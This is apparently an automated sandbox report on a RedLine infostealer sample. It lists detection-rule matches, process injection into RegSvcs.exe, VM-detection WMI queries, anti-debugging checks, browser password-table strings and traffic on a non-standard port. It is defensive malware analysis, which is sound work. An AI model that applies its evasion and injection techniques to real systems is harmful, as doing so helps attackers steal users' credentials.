Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/49@1/1

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_002337B5 GetLastError,FormatMessageW,

0_2_002337B5

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_002210BF AdjustTokenPrivileges,CloseHandle,		0_2_002210BF
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_002216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_002216C3

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_002351CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_002351CD

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0024A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0024A67C

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0023648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0023648E

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_001C42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001C42A2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2196:120:WilError_03

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

File created: C:\Users\user\AppData\Local\Temp\aut516D.tmp

Jump to behavior

Source: K3xL5Xy0XS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpD47B.tmp.1.dr, tmpC1A.tmp.1.dr, tmpD48B.tmp.1.dr, tmpD49C.tmp.1.dr, tmpD49D.tmp.1.dr, tmpD4AE.tmp.1.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: K3xL5Xy0XS.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\K3xL5Xy0XS.exe "C:\Users\user\Desktop\K3xL5Xy0XS.exe"
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\K3xL5Xy0XS.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\K3xL5Xy0XS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Section loaded: wldp.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: K3xL5Xy0XS.exe

Static file information: File size 1058304 > 1048576

Source: K3xL5Xy0XS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: K3xL5Xy0XS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: K3xL5Xy0XS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: K3xL5Xy0XS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: K3xL5Xy0XS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: K3xL5Xy0XS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: K3xL5Xy0XS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: RegSvcs.exe, 00000001.00000002.1882328233.0000000000617000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.0000000004100000.00000004.00001000.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1704029900.0000000003F60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.0000000004100000.00000004.00001000.00020000.00000000.sdmp, K3xL5Xy0XS.exe, 00000000.00000003.1704029900.0000000003F60000.00000004.00001000.00020000.00000000.sdmp

Source: K3xL5Xy0XS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: K3xL5Xy0XS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: K3xL5Xy0XS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: K3xL5Xy0XS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: K3xL5Xy0XS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_001C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001C42DE

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_001E0A76 push ecx; ret

0_2_001E0A89

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49734

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001DF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_001DF98E
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00251C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00251C41

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-95078

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

API/Special instruction interceptor: Address: 168632C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2239			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7396			Jump to behavior

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

API coverage: 3.9 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0022DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0022DBBE
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_002368EE FindFirstFileW,FindClose,	0_2_002368EE
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0023698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0023698F
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0022D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0022D076
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0022D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0022D3A9
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00239642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00239642
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0023979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0023979D
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00239B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00239B2B
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00235C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00235C97

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_001C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001C42DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: RegSvcs.exe, 00000001.00000002.1882328233.0000000000617000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll 5c

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0023EAA2 BlockInput,

0_2_0023EAA2

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_001F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_001F2622

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_001C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001C42DE

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E4CE8 mov eax, dword ptr fs:[00000030h]	0_2_001E4CE8
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_016865F8 mov eax, dword ptr fs:[00000030h]	0_2_016865F8
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_01686598 mov eax, dword ptr fs:[00000030h]	0_2_01686598
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_01684F78 mov eax, dword ptr fs:[00000030h]	0_2_01684F78

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_00220B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00220B62

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001F2622
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001E083F
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E09D5 SetUnhandledExceptionFilter,	0_2_001E09D5
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001E0C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

